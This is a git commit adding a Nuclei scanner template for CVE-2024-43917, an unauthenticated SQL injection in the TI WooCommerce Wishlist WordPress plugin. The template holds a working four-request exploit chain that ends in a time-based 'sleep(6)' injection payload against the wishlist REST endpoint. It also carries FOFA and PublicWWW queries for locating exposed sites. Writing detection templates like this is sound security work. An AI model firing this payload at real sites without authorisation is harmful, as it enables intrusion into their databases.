Merge pull request #10870 from projectdiscovery/CVE-2024-43917

Create CVE-2024-43917.yaml (WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection)
2024-10-05 12:46:29 +04:00 · 2024-10-05 12:46:29 +04:00 · 3e69febcea
parent e65157057a 4ac4ddcd23
commit 3e69febcea
1 changed files with 133 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-43917.yaml
+++ b/http/cves/2024/CVE-2024-43917.yaml
@ -0,0 +1,133 @@
+id: CVE-2024-43917
+
+info:
+  name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917.
+  reference:
+    - https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
+    - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43917
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-43917
+    cwe-id: CWE-89
+    epss-score: 0.00091
+    epss-percentile: 0.39641
+    cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: templateinvaders
+    product: ti_woocommerce_wishlist
+    framework: wordpress
+    fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
+    publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
+  tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
+
+flow: http(1) && http(2) && http(3) && http(4)
+
+http:
+  - raw:
+      - |
+        GET /?p=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    redirects: true
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: nonce
+        group: 1
+        regex:
+          - '"nonce":"([a-z0-9]+)"'
+
+  - raw:
+      - |
+        GET /product-category/uncategorized/ HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        part: body
+        internal: true
+        name: product_id
+        group: 1
+        regex:
+          - 'data-tinvwl_product_id="([0-9]+)"'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'data-tinvwl_product_id="'
+        internal: true
+
+  - raw:
+      - |
+        POST /product-category/uncategorized/ HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG
+
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="form[tinvwl-hidden-fields]"
+
+        []
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="tinv_wishlist_id"
+
+
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="tinv_wishlist_name"
+
+
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="product_type"
+
+        simple
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="product_id"
+
+        {{product_id}}
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="product_variation"
+
+        0
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="product_action"
+
+        addto
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG
+        Content-Disposition: form-data; name="redirect"
+
+        {{RootURL}}/product-category/uncategorized/
+        ------WebKitFormBoundaryNfcbSwJQX8ALWCMG--
+
+    extractors:
+      - type: json
+        part: body
+        name: share_key
+        internal: true
+        json:
+          - '.wishlist.share_key'
+
+  - raw:
+      - |
+        @timeout: 20s
+        GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
+        Host: {{Hostname}}
+        X-WP-Nonce: {{nonce}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration>=6"
+          - "contains(content_type, 'application/json')"
+          - "contains(body, 'product_id')"
+        condition: and